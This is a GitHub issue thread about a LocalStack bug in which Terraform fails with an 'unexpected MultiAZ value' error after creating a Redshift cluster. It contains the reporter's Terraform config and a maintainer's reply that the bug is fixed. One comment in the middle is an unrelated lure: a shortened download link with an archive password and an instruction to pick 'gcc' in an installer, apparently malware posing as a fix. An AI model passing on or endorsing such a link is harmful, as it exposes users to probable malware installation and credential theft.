### ISSUE TITLE
bug: Creating a Redshift cluster with Terraform throws an error that API returned unexpected MultiAZ value "" (empty string)

### ISSUE THREAD

**Issue by ronicthomas** [localstack/localstack#11420]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Current Behavior

I'm running into an issue while trying to create a Redshift cluster using Terraform and LocalStack Pro. The error message I keep getting is:

`unexpected MultiAZ value "" returned by API`

Below is a sample of the code I'm working with:
```
# Generate a random password
resource "random_password" "db_password" {
  length  = 16
  special = false
}

# TODO: throws an error after creation which blocks everything else

# Create the Redshift cluster using the credentials from Secrets Manager
resource "aws_redshift_cluster" "redshift_cluster" {
  cluster_identifier = "redshift_cluster"
  database_name      = "somerandomname"
  master_username    = "admin"
  master_password    = random_password.db_password.result
  node_type          = "dc2.large"

  lifecycle {
    ignore_changes = [master_password]
  }
}
```
I am using `tflocal `to run this piece of code. While the redshift cluster gets created in Localstack, any subsequent runs will not work throwing the above error. The workaround is to delete the cluster manually from localstack and terraform state which will unblock the Terraform run. 

### Expected Behavior

Creation of the Redshift cluster should work smoothly and any subsequent runs should not throw this error 

### How are you starting LocalStack?

With the `localstack` script

#### How are you starting localstack (e.g., `bin/localstack` command, arguments, or `docker-compose.yml`)

    $ export LOCALSTACK_AUTH_TOKEN=xxxxx
    $ localstack start 

#### Client commands (e.g., AWS SDK code snippet, or sequence of "awslocal" commands)

    $ pip install terraform-local
    $ cat >> main.tf << EOF
    # Generate a random password
    resource "random_password" "db_password" {
      length  = 16
      special = false
    }

    # TODO: throws an error after creation which blocks everything else
    
    # Create the Redshift cluster using the credentials from Secrets Manager
    resource "aws_redshift_cluster" "redshift_cluster" {
      cluster_identifier = "redshift_cluster"
      database_name      = "somerandomname"
      master_username    = "admin"
      master_password    = random_password.db_password.result
      node_type          = "dc2.large"
    
      lifecycle {
        ignore_changes = [master_password]
      }
    }
    
    $ tflocal init && tflocal apply -auto-approve
    

### Environment

```markdown
- OS: Windows 11 Pro
- LocalStack:
  LocalStack version: 3.6.1.dev20240826111648
  LocalStack Docker image sha: be00b2678e25adfc8b117af194d4b366964027d4b19ec824a24e6e6cd1760fd4   
  LocalStack build date: 2024-08-26
  LocalStack build git hash: 6453173
```

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by alexrashed** [comment]
Hi @ronicthomas!
This issue was addressed yesterday, and should now be fixed in the LocalStack Pro image.
Please make sure to explicitly pull the latest version of the image from DockerHub:
```
docker pull localstack/localstack-pro:latest
```
